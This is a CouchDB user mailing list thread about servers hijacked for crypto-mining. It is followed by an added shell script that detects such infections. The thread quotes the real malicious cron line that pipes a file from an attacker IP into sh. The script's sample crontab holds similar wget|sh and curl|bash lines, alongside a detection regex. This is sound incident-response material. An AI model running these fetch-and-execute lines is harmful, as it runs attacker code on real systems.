The hackers are changing the name of the script to other names like logo4.  It
took my CouchDB down for a while and now has subsided.  I searched the crontab
of all the accounts and could not find evidence there.  They must have evolved
to another method of execution once it gets installed....



------ Original Message ------
Received: 06:15 AM MST, 02/22/2018
From: Michael Bykov <m.by...@gmail.com>
To: user@couchdb.apache.org
Subject: Re: logo6

2018-02-18 0:20 GMT+03:00 Robert Samuel Newson <rnew...@apache.org>:

> sounds like http://docs.couchdb.org/en/2.1.1/cve/2017-12636.html
I have found malware script in crontab from user couchdb.

This very line: /bin/sh -c wget -q http://94.250.253.178/logo6.jpg -O - | sh

And yes, my version was 1.6

>
>
> B.
>
> > On 16 Feb 2018, at 11:50, Ingo Radatz <thewh...@googlemail.com> wrote:
> >
> > Hi Michael,
> >
> > I have experienced the same - this is a mining script. You can find the
> shell scripts in /tmp and in new database-folders of your couchdb (1.6.1?)
> installation. Finally I have moved to a new vm because the script could
> install itself again and again.
> >
> > Ingo
> >
> >> On 16. Feb 2018, at 12:31, Michael Bykov <m.by...@gmail.com> wrote:
> >>
> >> I see now in logs:
> >>
> >> couchdb  31167  0.0  0.0   6684   992 ?        SNs  22:21   0:00      \_
> >> /bin/sh -c wget -q http://94.250.253.178/logo6.jpg -O - | sh
> >> couchdb  31169  0.0  0.0   6684  1136 ?        SN   22:21   0:00      |
> >> \_ sh
> >> couchdb  31264  0.0  0.0   4156   564 ?        SN   22:21   0:00      |
> >>  \_ sleep 60
> >> couchdb  31193  0.0  0.1  55968  3772 ?        SN   22:21   0:00      \_
> >> /usr/sbin/sendmail -FCronDaemon -odi -oem -oi -t
> >>
> >> What should be done?
> >>
> >>
> >> --
> >> М.
> >>
> >> http://diglossa.ru
> >> xmpp://m.by...@jabber.ru
> >
>
>


-- 
М.

http://diglossa.ru
xmpp://m.by...@jabber.ru
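The thread's indicators are a crontab entry and a process tree that fetch a remote file and pipe it straight into a shell, plus dropped scripts in /tmp. The POSIX shell script below is an added example, not code from the thread or from the CouchDB project: it encodes that "network fetch piped to a shell" pattern as a single regular expression, runs it over constructed sample crontab lines (the 198.51.100.10 address and the file names are constructed stand-ins, not the thread's indicators), and provides functions that apply the same check to a live host's cron sources, process list and /tmp. The cron spool paths and the assumption that the payload is fetched with wget or curl are the author's assumptions, not facts from the thread.

```shell
#!/bin/sh
# Added example for the CouchDB thread above; not part of the original mail.
# Flags cron entries, processes and dropped files that match the pattern the
# thread describes: a remote fetch piped directly into a shell.

# "network fetch piped into a shell". Assumption: wget or curl is the
# downloader; an optional path (/bin/, /usr/bin/) may precede the shell name.
PIPE_TO_SHELL='(wget|curl)[^|]*\|[[:space:]]*(/[[:alnum:]_/]*/)?(ba|da|z|k)?sh([^[:alnum:]_]|$)'

# flag_pipe_to_shell: read lines on stdin, print those matching PIPE_TO_SHELL.
# Exit status 0 when at least one line was flagged, 1 when none was.
flag_pipe_to_shell() {
    grep -E "$PIPE_TO_SHELL"
}

# count_flagged: number of flagged lines on stdin (always exits 0).
count_flagged() {
    flag_pipe_to_shell | wc -l | tr -d ' '
}

# scan_cron_sources: check system crontab, cron.d and per-user spools.
# Assumed paths for Debian/Ubuntu and RHEL-style hosts; reading other
# users' spool files needs root. Prints "file:line" for each hit.
scan_cron_sources() {
    for f in /etc/crontab /etc/cron.d/* /var/spool/cron/crontabs/* /var/spool/cron/*; do
        [ -f "$f" ] || continue
        grep -EH "$PIPE_TO_SHELL" "$f" || true
    done
}

# scan_processes: the thread's ps output shows the same command line running
# under the couchdb user, so check what is executing right now.
scan_processes() {
    ps -eo user,pid,args | flag_pipe_to_shell || true
}

# scan_dropped_scripts: list recently modified files that start with a shell
# shebang under a directory (default /tmp; pass the CouchDB data directory
# to cover the "new database-folders" mentioned in the thread).
scan_dropped_scripts() {
    dir=${1:-/tmp}
    find "$dir" -type f -mtime -7 -exec grep -lE '^#!.*sh' {} + 2>/dev/null || true
}

# Constructed sample crontab, modelled on the thread's entry. Two lines
# should be flagged: the wget|sh entry and the curl|bash entry. The backup
# job and the plain wget-to-file download should not.
SAMPLE_CRON='# constructed sample crontab
*/5 * * * * /bin/sh -c "wget -q http://198.51.100.10/logo6.jpg -O - | sh"
0 3 * * * /usr/bin/couchdb-backup.sh
@reboot curl -s http://198.51.100.10/update | bash
15 * * * * /usr/bin/wget -q -O /var/tmp/report.txt http://intranet.example/report'

# Demonstration on the constructed sample only; run scan_cron_sources,
# scan_processes and scan_dropped_scripts on a real host as root.
printf '%s\n' "$SAMPLE_CRON" | flag_pipe_to_shell \
    || echo "no fetch-and-pipe-to-shell entries in sample"
```

On a live host run the three scan functions as root and compare the output across users: the thread's case was a per-user spool entry under couchdb, which an unprivileged `crontab -l` from another account would never show.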